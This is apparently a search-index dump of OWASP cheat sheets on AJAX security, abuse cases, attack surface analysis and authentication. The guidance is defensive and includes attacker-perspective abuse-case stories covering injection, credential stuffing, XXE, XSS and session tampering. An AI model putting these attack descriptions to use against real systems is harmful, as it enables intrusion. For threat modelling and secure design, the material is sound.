Always have the outside primitive be an object for JSON strings:

Exploitable:

[{\"object\": \"inside an array\"}]\n

Not exploitable:

{\"object\": \"not inside an array\"}\n

Also not exploitable:

{\"result\": [{\"object\": \"inside an array\"}]}\n
"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-writing-serialization-code-server-side","title":"Avoid writing serialization code Server Side","text":"

Remember ref vs. value types! Look for an existing library that has been reviewed.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#services-can-be-called-by-users-directly","title":"Services can be called by users directly","text":"

Even though you only expect your AJAX client side code to call those services the users can too.

Make sure you validate inputs and treat them like they are under user control (because they are!).

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#avoid-building-xml-or-json-by-hand-use-the-framework","title":"Avoid building XML or JSON by hand, use the framework","text":"

Use the framework and be safe, do it by hand and have security issues.

"},{"location":"cheatsheets/AJAX_Security_Cheat_Sheet.html#use-json-and-xml-schema-for-webservices","title":"Use JSON And XML Schema for Webservices","text":"

You need to use a third-party library to validate web services.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html","title":"Abuse Case Cheat Sheet","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Often when the security level of an application is mentioned in requirements, the following expressions are met:

These security requirements are too generic, and thus useless for a development team...

In order to build a secure application, from a pragmatic point of view, it is important to identify the attacks which the application must defend against, according to its business and technical context.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#objective","title":"Objective","text":"

The objective of this cheat sheet is to provide an explanation of what an Abuse Case is, why abuse cases are important when considering the security of an application, and finally to provide a proposal for a pragmatic approach to building a list of abuse cases and tracking them for every feature planned for implementation as part of an application. The cheat sheet may be used for this purpose regardless of the project methodology used (waterfall or agile).

Important note about this Cheat Sheet:

The main objective is to provide a pragmatic approach in order to allow a company or a project team\nto start building and handling the list of abuse cases and then customize the elements\nproposed to its context/culture in order to, finally, build its own method.\n\nThis cheat sheet can be seen as a getting-started tutorial.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#context-approach","title":"Context & approach","text":""},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#why-clearly-identify-the-attacks","title":"Why clearly identify the attacks","text":"

Clearly identifying the attacks against which the application must defend is essential in order to enable the following steps in a project or sprint:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#notion-of-abuse-case","title":"Notion of Abuse Case","text":"

In order to help build the list of attacks, the notion of Abuse Cases is helpful.

An Abuse Case can be defined as:

A way to use a feature that was not expected by the implementer,\nallowing an attacker to influence the feature or outcome of use of\nthe feature based on the attacker action (or input).\n

Synopsis defines an Abuse Case like this:

Misuse and abuse cases describe how users misuse or exploit the weaknesses\nof controls in software features to attack an application.\n\nThis can lead to tangible business impact when a direct attack against\nbusiness functionalities, which may bring in revenue or provide\npositive user experience, are attacked.\n\nAbuse cases can also be an effective way to drive security requirements\nthat lead to proper protection of these critical business use cases.\n

Synopsis source

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#how-to-define-the-list-of-abuse-cases","title":"How to define the list of Abuse Cases","text":"

There are many different ways to define the list of abuse cases for a feature (that can be mapped to a user story in agile projects).

The project OWASP Open SAMM proposes the following approach in the Stream B of the Security Practice Requirements Driven Testing for the Maturity level 2:

Misuse and abuse cases describe unintended and malicious use scenarios of the application, describing how an attacker could do this. Create misuse and abuse cases to misuse or exploit the weaknesses of controls in software features to attack an application. Use abuse-case models for an application to serve as fuel for identification of concrete security tests that directly or indirectly exploit the abuse scenarios.\n\nAbuse of functionality, sometimes referred to as a \u201cbusiness logic attack\u201d, depends on the design and implementation of application functions and features. An example is using a password reset flow to enumerate accounts. As part of business logic testing, identify the business rules that are important for the application and turn them into experiments to verify whether the application properly enforces the business rule. For example, on a stock trading application, is the attacker allowed to start a trade at the beginning of the day and lock in a price, hold the transaction open until the end of the day, then complete the sale if the stock price has risen or cancel if the price dropped?\n

Open SAMM source: Verification Requirement Driven Testing Stream B

Another way to achieve the building of the list can be the following (more bottom-up and collaboratively oriented):

Make a workshop that includes people with the following profiles:

During this workshop (duration will depend on the size of the feature list, but 4 hours is a good start) all business features that will be part of the project or the sprint will be processed. The output of the workshop will be a list of attacks (abuse cases) for all business features. All abuse cases will have a risk rating that allows for filtering and prioritization.

It is important to take into account Technical and Business kind of abuse cases and mark them accordingly.

Example:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#when-to-define-the-list-of-abuse-cases","title":"When to define the list of Abuse Cases","text":"

In agile projects, the definition workshop must be made after the meeting in which User Stories are included in a Sprint.

In waterfall projects, the definition workshop must be made when the business features to implement are identified and known by the business.

Whatever the mode of project used (agile or waterfall), the abuse cases selected to be addressed must become security requirements in each feature specification section (waterfall) or User Story acceptance criteria (agile) in order to allow additional cost/effort evaluation, identification and implementation of the countermeasures.

Each abuse case must have a unique identifier in order to allow tracking throughout the whole project/sprint (details about this point will be given in the proposal section).

An example of unique ID format can be ABUSE_CASE_001.

The following figure provides an overview of the chaining of the different steps involved (from left to right):

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#proposal","title":"Proposal","text":"

The proposal will focus on the output of the workshop explained in the previous section.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-1-preparation-of-the-workshop","title":"Step 1: Preparation of the workshop","text":"

First, even if it seems obvious, the key business people must be sure to know, understand and be able to explain the business features that will be processed during the workshop.

Secondly, create a new Microsoft Excel file (you can also use Google Sheets or any other similar software) with the following sheets (or tabs):

This is the representation of each sheet along with an example of content that will be filled during the workshop:

FEATURES sheet:

Feature unique ID Feature name Feature short description FEATURE_001 DocumentUploadFeature Allow user to upload document along a message

COUNTERMEASURES sheet:

Countermeasure unique ID Countermeasure short description Countermeasure help/hint DEFENSE_001 Validate the uploaded file by loading it into a parser Use advice from the OWASP Cheat Sheet about file upload

ABUSE CASES sheet:

Abuse case unique ID Feature ID impacted Abuse case's attack description Attack referential ID (if applicable) CVSS V3 risk rating (score) CVSS V3 string Kind of abuse case Countermeasure ID applicable Handling decision (To Address or Risk Accepted) ABUSE_CASE_001 FEATURE_001 Upload Office file with malicious macro in charge of dropping a malware CAPEC-17 HIGH (7.7) CVSS:3.0/AV:N/AC:H/PR:L/UI:R/S:C/C:N/I:H/A:H Technical DEFENSE_001 To Address"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-2-during-the-workshop","title":"Step 2: During the workshop","text":"

Use the spreadsheet to review all the features.

For each feature, follow this flow:

  1. Key business people explain the current feature from a business point of view.
  2. Penetration testers propose and explain a set of attacks that they can perform against the feature.
  3. For each attack proposed:

    1. Appsec proposes a countermeasure and a preferred set up location (infrastructure, network, code, design...).
    2. Technical people give feedback about the feasibility of the proposed countermeasure.
    3. Penetration testers use the CVSS v3 (or other standard) calculator to determine a risk rating. (ex: CVSS V3 calculator)
    4. Risk key people accept/increase/decrease the rating to have final one that match the real business impact for the company.
  4. Business, Risk and Technical key peoples find a consensus and filter the list of abuses for the current feature to keep the ones that must be addressed, and then flag them accordingly in the ABUSE CASES sheet (if risk is accepted then add a comment to explain why).

  5. Pass to next feature...

If the presence of penetration testers is not possible then you can use the following references to identify the applicable attacks on your features:

Important note on attacks and countermeasure knowledge base(s):

With the time and across projects, you will obtain your own dictionary of attacks and countermeasures\nthat are applicable to the kind of application in your business domain.\n\nThis dictionary will speed up the future workshops in a significant way.\n\nTo promote the creation of this dictionary, you can, at the end of the project/sprint, gather the list\nof attacks and countermeasures identified in a central location (wiki, database, file...) that will be\nused during the next workshop in combination with input from penetration pesters.\n
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-3-after-the-workshop","title":"Step 3: After the workshop","text":"

The spreadsheet contains (at this stage) the list of all abuse cases that must be handled and, potentially (depending on the capacity) corresponding countermeasures.

Now, there are two remaining task:

  1. Key business people must update the specification of each feature (waterfall) or the User Story of each feature (agile) to include the associated abuse cases as Security Requirements (waterfall) or Acceptance Criteria (agile).
  2. Key technical people must evaluate the overhead in terms of charge/effort to take into account the countermeasure.
"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-4-during-implementation-abuse-cases-handling-tracking","title":"Step 4: During implementation - Abuse cases handling tracking","text":"

In order to track the handling of all the abuse cases, the following approach can be used:

If one or several abuse cases are handled at:

Using this way, it becomes possible (via some minor scripting) to identify where abuse cases are addressed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#step-5-during-implementation-abuse-cases-handling-validation","title":"Step 5: During implementation - Abuse cases handling validation","text":"

As abuse cases are defined, it is possible to put in place automated or manual validations to ensure that:

Validations can be of the following kinds:

Adding automated tests also allow teams to track that countermeasures against the abuse cases are still effective/in place during a maintenance or bug fixing phase of a project (to prevent accidental removal/disabling). It is also useful when a Continuous Delivery approach is used, to ensure that all abuse cases protections are in place before opening access to the application.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#example-of-derivation-of-abuse-cases-as-user-stories","title":"Example of derivation of Abuse Cases as User Stories","text":"

The following section show an example of derivation of Abuse Cases as User Stories, here using the OWASP TOP 10 as input source.

Threat Oriented Personas:

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a12017-injection","title":"A1:2017-Injection","text":"

Epic:

Almost any source of data can be an injection vector, environment variables, parameters, external and internal web services, and all types of users. Injection flaws occur when an attacker can send hostile data to an interpreter.

Abuse Case:

As an attacker, I will perform an injection attack (SQL, LDAP, XPath, or NoSQL queries, OS commands, XML parsers, SMTP headers, expression languages, and ORM queries) against input fields of the User or API interfaces

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a22017-broken-authentication","title":"A2:2017-Broken Authentication","text":"

Epic:

Attackers have access to hundreds of millions of valid username and password combinations for credential stuffing, default administrative account lists, automated brute force, and dictionary attack tools. Session management attacks are well understood, particularly in relation to unexpired session tokens.

Abuse Case:

As an attacker, I have access to hundreds of millions of valid username and password combinations for credential stuffing.

Abuse Case:

As an attacker, I have default administrative account lists, automated brute force, and dictionary attack tools I use against login areas of the application and support systems.

Abuse Case:

As an attacker, I manipulate session tokens using expired and fake tokens to gain access.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a32017-sensitive-data-exposure","title":"A3:2017-Sensitive Data Exposure","text":"

Epic:

Rather than directly attacking crypto, attackers steal keys, execute man-in-the-middle attacks, or steal clear text data off the server, while in transit, or from the user's client, e.g. browser. A manual attack is generally required. Previously retrieved password databases could be brute forced by Graphics Processing Units (GPUs).

Abuse Case:

As an attacker, I steal keys that were exposed in the application to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I execute man-in-the-middle attacks to get access to traffic and leverage it to obtain sensitive data and possibly get unauthorized access to the application.

Abuse Case:

As an attacker, I steal clear text data off the server, while in transit, or from the user's client, e.g. browser to get unauthorized access to the application or system.

Abuse Case:

As an attacker, I find and target old or weak cryptographic algorithms by capturing traffic and breaking the encryption.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a42017-xml-external-entities-xxe","title":"A4:2017-XML External Entities (XXE)","text":"

Epic:

Attackers can exploit vulnerable XML processors if they can upload XML or include hostile content in an XML document, exploiting vulnerable code, dependencies or integrations.

Abuse Case:

As an attacker, I exploit vulnerable areas of the application where the user or system can upload XML to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include hostile content in an XML document which is uploaded to the application or system to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack, as well as execute other attacks.

Abuse Case:

As an attacker, I include malicious XML code to exploit vulnerable code, dependencies or integrations to extract data, execute a remote request from the server, scan internal systems, perform a denial-of-service attack (e.g. Billion Laughs attack), as well as execute other attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a52017-broken-access-control","title":"A5:2017-Broken Access Control","text":"

Epic:

Exploitation of access control is a core skill of attackers. Access control is detectable using manual means, or possibly through automation for the absence of access controls in certain frameworks.

Abuse Case:

As an attacker, I bypass access control checks by modifying the URL, internal application state, or the HTML page, or simply using a custom API attack tool.

Abuse Case:

As an attacker, I manipulate the primary key and change it to access another's users record, allowing viewing or editing someone else's account.

Abuse Case:

As an attacker, I manipulate sessions, access tokens, or other access controls in the application to act as a user without being logged in, or acting as an admin/privileged user when logged in as a user.

Abuse Case:

As an attacker, I leverage metadata manipulation, such as replaying or tampering with a JSON Web Token (JWT) access control token or a cookie or hidden field manipulated to elevate privileges or abusing JWT invalidation.

Abuse Case:

As an attacker, I exploit Cross-Origin Resource Sharing CORS misconfiguration allowing unauthorized API access.

Abuse Case:

As an attacker, I force browsing to authenticated pages as an unauthenticated user or to privileged pages as a standard user.

Abuse Case:

As an attacker, I access APIs with missing access controls for POST, PUT and DELETE.

Abuse Case:

As an attacker, I target default crypto keys in use, weak crypto keys generated or re-used, or keys where rotation missing is missing.

Abuse Case:

As an attacker, I find areas where the user agent (e.g. app, mail client) does not verify if the received server certificate is valid and perform attacks where I get unauthorized access to data.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a62017-security-misconfiguration","title":"A6:2017-Security Misconfiguration","text":"

Epic:

Attackers will often attempt to exploit unpatched flaws or access default accounts, unused pages, unprotected files and directories, etc to gain unauthorized access or knowledge of the system.

Abuse Case:

As an attacker, I find and exploit missing appropriate security hardening configurations on any part of the application stack, or improperly configured permissions on cloud services.

Abuse Case:

As an attacker, I find unnecessary features which are enabled or installed (e.g. unnecessary ports, services, pages, accounts, or privileges) and attack or exploit the weakness.

Abuse Case:

As an attacker, I use default accounts and their passwords to access systems, interfaces, or perform actions on components which I should not be able to.

Abuse Case:

As an attacker, I find areas of the application where error handling reveals stack traces or other overly informative error messages I can use for further exploitation.

Abuse Case:

As an attacker, I find areas where upgraded systems, latest security features are disabled or not configured securely.

Abuse Case:

As an attacker, I find security settings in the application servers, application frameworks (e.g. Struts, Spring, ASP.NET), libraries, databases, etc. not set to secure values.

Abuse Case:

As an attacker, I find the server does not send security headers or directives or they are not set to secure values.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a72017-cross-site-scripting-xss","title":"A7:2017-Cross-Site Scripting (XSS)","text":"

Epic:

XSS is the second most prevalent issue in the OWASP Top 10, and is found in around two-thirds of all applications.

Abuse Case:

As an attacker, I perform reflected XSS where the application or API includes unvalidated and unescaped user input as part of HTML output. My successful attack can allow the attacker to execution of arbitrary HTML and JavaScript in my victim's browser. Typically the victim will need to interact with some malicious link that points to an attacker-controlled page, such as malicious watering hole websites, advertisements, or similar.

Abuse Case:

As an attacker, I perform stored XSS where the application or API stores unsanitized user input that is viewed at a later time by another user or an administrator.

Abuse Case:

As an attacker, I perform DOM XSS where JavaScript frameworks, single-page applications, and APIs that dynamically include attacker-controllable data to a page is vulnerable to DOM XSS.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a82017-insecure-deserialization","title":"A8:2017-Insecure Deserialization","text":"

Epic:

Exploitation of deserialization is somewhat difficult, as off-the-shelf exploits rarely work without changes or tweaks to the underlying exploit code.

Abuse Case:

As an attacker, I find areas of the application and APIs where deserialization of hostile or tampered objects can be supplied. As a result, I can focus on an object and data structure related attacks where the attacker modifies application logic or achieves arbitrary remote code execution if there are classes available to the application that can change behavior during or after deserialization. Or I focus on data tampering attacks such as access-control-related attacks where existing data structures are used but the content is changed.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a92017-using-components-with-known-vulnerabilities","title":"A9:2017-Using Components with Known Vulnerabilities","text":"

Epic:

While it is easy to find already-written exploits for many known vulnerabilities, other vulnerabilities require concentrated effort to develop a custom exploit.

Abuse Case:

As an attacker, I find common open source or closed source packages with weaknesses and perform attacks against vulnerabilities and exploits which are disclosed

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#a102017-insufficient-logging-monitoring","title":"A10:2017-Insufficient Logging & Monitoring","text":"

Epic:

Exploitation of insufficient logging and monitoring is the bedrock of nearly every major incident. Attackers rely on the lack of monitoring and timely response to achieve their goals without being detected. In 2016, identifying a breach took an average of 191 days so plenty of time for damage to be inflicted.

Abuse Case:

As an attacker, I attack an organization and the logs, monitoring systems, and teams do not see or respond to my attacks.

"},{"location":"cheatsheets/Abuse_Case_Cheat_Sheet.html#sources-of-the-schemas","title":"Sources of the schemas","text":"

All figures were created using https://www.draw.io/ site and exported (as PNG image) for integration into this article.

All XML descriptor files for each schema are available below (using XML description, modification of the schema is possible using DRAW.IO site):

Schemas descriptors archive

"},{"location":"cheatsheets/Access_Control_Cheat_Sheet.html","title":"DEPRECATED: Access Control Cheatsheet","text":"

The Access Control cheeetsheet has been deprecated.

Please visit the Authorization Cheatsheet instead.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html","title":"Attack Surface Analysis Cheat Sheet","text":""},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#what-is-attack-surface-analysis-and-why-is-it-important","title":"What is Attack Surface Analysis and Why is it Important","text":"

This article describes a simple and pragmatic way of doing Attack Surface Analysis and managing an application's Attack Surface. It is targeted to be used by developers to understand and manage application security risks as they design and change an application, as well as by application security specialists doing a security risk assessment. The focus here is on protecting an application from external attack - it does not take into account attacks on the users or operators of the system (e.g. malware injection, social engineering attacks), and there is less focus on insider threats, although the principles remain the same. The internal attack surface is likely to be different to the external attack surface and some users may have a lot of access.

Attack Surface Analysis is about mapping out what parts of a system need to be reviewed and tested for security vulnerabilities. The point of Attack Surface Analysis is to understand the risk areas in an application, to make developers and security specialists aware of what parts of the application are open to attack, to find ways of minimizing this, and to notice when and how the Attack Surface changes and what this means from a risk perspective.

Attack Surface Analysis is usually done by security architects and pen testers. But developers should understand and monitor the Attack Surface as they design and build and change a system.

Attack Surface Analysis helps you to:

  1. identify what functions and what parts of the system you need to review/test for security vulnerabilities
  2. identify high risk areas of code that require defense-in-depth protection - what parts of the system that you need to defend
  3. identify when you have changed the attack surface and need to do some kind of threat assessment
"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#defining-the-attack-surface-of-an-application","title":"Defining the Attack Surface of an Application","text":"

The Attack Surface describes all of the different points where an attacker could get into a system, and where they could get data out.

The Attack Surface of an application is:

  1. the sum of all paths for data/commands into and out of the application, and
  2. the code that protects these paths (including resource connection and authentication, authorization, activity logging, data validation and encoding)
  3. all valuable data used in the application, including secrets and keys, intellectual property, critical business data, personal data and PII, and
  4. the code that protects these data (including encryption and checksums, access auditing, and data integrity and operational security controls).

You overlay this model with the different types of users - roles, privilege levels - that can access the system (whether authorized or not). Complexity increases with the number of different types of users. But it is important to focus especially on the two extremes: unauthenticated, anonymous users and highly privileged admin users (e.g. database administrators, system administrators).

Group each type of attack point into buckets based on risk (external-facing or internal-facing), purpose, implementation, design and technology. You can then count the number of attack points of each type, then choose some cases for each type, and focus your review/assessment on those cases.

With this approach, you don't need to understand every endpoint in order to understand the Attack Surface and the potential risk profile of a system. Instead, you can count the different general type of endpoints and the number of points of each type. With this you can budget what it will take to assess risk at scale, and you can tell when the risk profile of an application has significantly changed.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#microservice-and-cloud-native-applications","title":"Microservice and Cloud Native Applications","text":"

Microservice and Cloud Native applications are comprised of multiple smaller components, loosely coupled using APIs and independently scalable. When assessing the attack surface for applications of this architectural style, you should prioritize the components that are reachable from an attack source (e.g. external traffic from the Internet). Such components may be located behind tiers of proxies, load balancers and ingress controllers, and may auto-scale without warning.

Open source tooling such as Scope or ThreatMapper assist in visualizing the attack surface.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#identifying-and-mapping-the-attack-surface","title":"Identifying and Mapping the Attack Surface","text":"

You can start building a baseline description of the Attack Surface in a picture and notes. Spend a few hours reviewing design and architecture documents from an attacker's perspective. Read through the source code and identify different points of entry/exit:

The total number of different attack points can easily add up into the thousands or more. To make this manageable, break the model into different types based on function, design and technology:

You also need to identify the valuable data (e.g. confidential, sensitive, regulated) in the application, by interviewing developers and users of the system, and again by reviewing the source code.

You can also build up a picture of the Attack Surface by scanning the application. For web apps you can use a tool like the OWASP ZAP or Arachni or Skipfish or w3af or one of the many commercial dynamic testing and vulnerability scanning tools or services to crawl your app and map the parts of the application that are accessible over the web. Some web application firewalls (WAFs) may also be able to export a model of the application's entry points.

Validate and fill in your understanding of the Attack Surface by walking through some of the main use cases in the system: signing up and creating a user profile, logging in, searching for an item, placing an order, changing an order, and so on. Follow the flow of control and data through the system, see how information is validated and where it is stored, what resources are touched and what other systems are involved. There is a recursive relationship between Attack Surface Analysis and Application Threat Modeling: changes to the Attack Surface should trigger threat modeling, and threat modeling helps you to understand the Attack Surface of the application.

The Attack Surface model may be rough and incomplete to start, especially if you haven't done any security work on the application before. Fill in the holes as you dig deeper in a security analysis, or as you work more with the application and realize that your understanding of the Attack Surface has improved.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#measuring-and-assessing-the-attack-surface","title":"Measuring and Assessing the Attack Surface","text":"

Once you have a map of the Attack Surface, identify the high risk areas. Focus on remote entry points \u2013 interfaces with outside systems and to the Internet \u2013 and especially where the system allows anonymous, public access.

These are often where you are most exposed to attack. Then understand what compensating controls you have in place, operational controls like network firewalls and application firewalls, and intrusion detection or prevention systems to help protect your application.

Michael Howard at Microsoft and other researchers have developed a method for measuring the Attack Surface of an application, and to track changes to the Attack Surface over time, called the Relative Attack Surface Quotient (RSQ). Using this method you calculate an overall attack surface score for the system, and measure this score as changes are made to the system and to how it is deployed. Researchers at Carnegie Mellon built on this work to develop a formal way to calculate an Attack Surface Metric for large systems like SAP. They calculate the Attack Surface as the sum of all entry and exit points, channels (the different ways that clients or external systems connect to the system, including TCP/UDP ports, RPC end points, named pipes...) and untrusted data elements. Then they apply a damage potential/effort ratio to these Attack Surface elements to identify high-risk areas.

Note that deploying multiple versions of an application, leaving features in that are no longer used just in case they may be needed in the future, or leaving old backup copies and unused code increases the Attack Surface. Source code control and robust change management/configurations practices should be used to ensure the actual deployed Attack Surface matches the theoretical one as closely as possible.

Backups of code and data - online, and on offline media - are an important but often ignored part of a system's Attack Surface. Protecting your data and IP by writing secure software and hardening the infrastructure will all be wasted if you hand everything over to bad actors by not protecting your backups.

"},{"location":"cheatsheets/Attack_Surface_Analysis_Cheat_Sheet.html#managing-the-attack-surface","title":"Managing the Attack Surface","text":"

Once you have a baseline understanding of the Attack Surface, you can use it to incrementally identify and manage risks going forward as you make changes to the application. Ask yourself:

The first web page that you create opens up the system's Attack Surface significantly and introduces all kinds of new risks. If you add another field to that page, or another web page like it, while technically you have made the Attack Surface bigger, you haven't increased the risk profile of the application in a meaningful way. Each of these incremental changes is more of the same, unless you follow a new design or use a new framework.

If you add another web page that follows the same design and using the same technology as existing web pages, it's easy to understand how much security testing and review it needs. If you add a new web services API or file that can be uploaded from the Internet, each of these changes have a different risk profile again - see if the change fits in an existing bucket, see if the existing controls and protections apply. If you're adding something that doesn't fall into an existing bucket, this means that you have to go through a more thorough risk assessment to understand what kind of security holes you may open and what protections you need to put in place.

Changes to session management, authentication and password management directly affect the Attack Surface and need to be reviewed. So do changes to authorization and access control logic, especially adding or changing role definitions, adding admin users or admin functions with high privileges. Similarly for changes to the code that handles encryption and secrets. Fundamental changes to how data validation is done. And major architectural changes to layering and trust relationships, or fundamental changes in technical architecture \u2013 swapping out your web server or database platform, or changing the runtime operating system.

As you add new user types or roles or privilege levels, you do the same kind of analysis and risk assessment. Overlay the type of access across the data and functions and look for problems and inconsistencies. It's important to understand the access model for the application, whether it is positive (access is deny by default) or negative (access is allow by default). In a positive access model, any mistakes in defining what data or functions are permitted to a new user type or role are easy to see. In a negative access model, you have to be much more careful to ensure that a user does not get access to data/functions that they should not be permitted to.

This kind of threat or risk assessment can be done periodically, or as a part of design work in serial / phased / spiral / waterfall development projects, or continuously and incrementally in Agile / iterative development.

Normally, an application's Attack Surface will increase over time as you add more interfaces and user types and integrate with other systems. You also want to look for ways to reduce the size of the Attack Surface when you can by simplifying the model (reducing the number of user levels for example or not storing confidential data that you don't absolutely have to), turning off features and interfaces that aren't being used, by introducing operational controls such as a Web Application Firewall (WAF) and real-time application-specific attack detection.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html","title":"Authentication Cheat Sheet","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Authentication is the process of verifying that an individual, entity or website is whom it claims to be. Authentication in the context of web applications is commonly performed by submitting a username or ID and one or more items of private information that only a given user should know.

Session Management is a process by which a server maintains the state of an entity interacting with it. This is required for a server to remember how to react to subsequent requests throughout a transaction. Sessions are maintained on the server by a session identifier which can be passed back and forth between the client and server when transmitting and receiving requests. Sessions should be unique per user and computationally very difficult to predict. The Session Management Cheat Sheet contains further guidance on the best practices in this area.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-general-guidelines","title":"Authentication General Guidelines","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#user-ids","title":"User IDs","text":"

Make sure your usernames/user IDs are case-insensitive. User 'smith' and user 'Smith' should be the same user. Usernames should also be unique. For high-security applications, usernames could be assigned and secret instead of user-defined public data.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#email-address-as-a-user-id","title":"Email address as a User ID","text":"

For information on validating email addresses, please visit the input validation cheatsheet email discussion.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-solution-and-sensitive-accounts","title":"Authentication Solution and Sensitive Accounts","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-proper-password-strength-controls","title":"Implement Proper Password Strength Controls","text":"

A key concern when using passwords for authentication is password strength. A \"strong\" password policy makes it difficult or even improbable for one to guess the password through either manual or automated means. The following characteristics define a strong password:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#for-more-detailed-information-check","title":"For more detailed information check","text":""},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#implement-secure-password-recovery-mechanism","title":"Implement Secure Password Recovery Mechanism","text":"

It is common for an application to have a mechanism that provides a means for a user to gain access to their account in the event they forget their password. Please see Forgot Password Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#store-passwords-in-a-secure-fashion","title":"Store Passwords in a Secure Fashion","text":"

It is critical for an application to store a password using the right cryptographic technique. Please see Password Storage Cheat Sheet for details on this feature.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#compare-password-hashes-using-safe-functions","title":"Compare Password Hashes Using Safe Functions","text":"

Where possible, the user-supplied password should be compared to the stored password hash using a secure password comparison function provided by the language or framework, such as the password_verify() function in PHP. Where this is not possible, ensure that the comparison function:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#change-password-feature","title":"Change Password Feature","text":"

When developing change password feature, ensure to have:

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#transmit-passwords-only-over-tls-or-other-strong-transport","title":"Transmit Passwords Only Over TLS or Other Strong Transport","text":"

See: Transport Layer Protection Cheat Sheet

The login page and all subsequent authenticated pages must be exclusively accessed over TLS or other strong transport. Failure to utilize TLS or other strong transport for the login page allows an attacker to modify the login form action, causing the user's credentials to be posted to an arbitrary location. Failure to utilize TLS or other strong transport for authenticated pages after login enables an attacker to view the unencrypted session ID and compromise the user's authenticated session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#require-re-authentication-for-sensitive-features","title":"Require Re-authentication for Sensitive Features","text":"

In order to mitigate CSRF and session hijacking, it's important to require the current credentials for an account before updating sensitive account information such as the user's password, user's email, or before sensitive transactions, such as shipping a purchase to a new address. Without this countermeasure, an attacker may be able to execute sensitive transactions through a CSRF or XSS attack without needing to know the user's current credentials. Additionally, an attacker may get temporary physical access to a user's browser or steal their session ID to take over the user's session.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#consider-strong-transaction-authentication","title":"Consider Strong Transaction Authentication","text":"

Some applications should use a second factor to check whether a user may perform sensitive operations. For more information, see the Transaction Authorization Cheat Sheet.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#tls-client-authentication","title":"TLS Client Authentication","text":"

TLS Client Authentication, also known as two-way TLS authentication, consists of both, browser and server, sending their respective TLS certificates during the TLS handshake process. Just as you can validate the authenticity of a server by using the certificate and asking a well known Certificate Authority (CA) if the certificate is valid, the server can authenticate the user by receiving a certificate from the client and validating against a third party CA or its own CA. To do this, the server must provide the user with a certificate generated specifically for him, assigning values to the subject so that these can be used to determine what user the certificate should validate. The user installs the certificate on a browser and now uses it for the website.

It is a good idea to do this when:

It is generally not a good idea to use this method for widely and publicly available websites that will have an average user. For example, it wouldn't be a good idea to implement this for a website like Facebook. While this technique can prevent the user from having to type a password (thus protecting against an average keylogger from stealing it), it is still considered a good idea to consider using both a password and TLS client authentication combined.

Additionally, if the client is behind an enterprise proxy which performs SSL/TLS decryption, this will break certificate authentication unless the site is allowed on the proxy.

For more information, see: Client-authenticated TLS handshake

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-and-error-messages","title":"Authentication and Error Messages","text":"

Incorrectly implemented error messages in the case of authentication functionality can be used for the purposes of user ID and password enumeration. An application should respond (both HTTP and HTML) in a generic manner.

"},{"location":"cheatsheets/Authentication_Cheat_Sheet.html#authentication-responses","title":"Authentication Responses","text":"

Using any of the authentication mechanisms (login, password reset or password recovery), an application must respond with a generic error message regardless of whether:

The account registration feature should also be taken into consideration, and the same approach of generic error message can be applied regarding the case in which the user exists.

The objective is to prevent the creation of a discrepancy factor, allowing an attacker to mount a user enumeration action against the application.

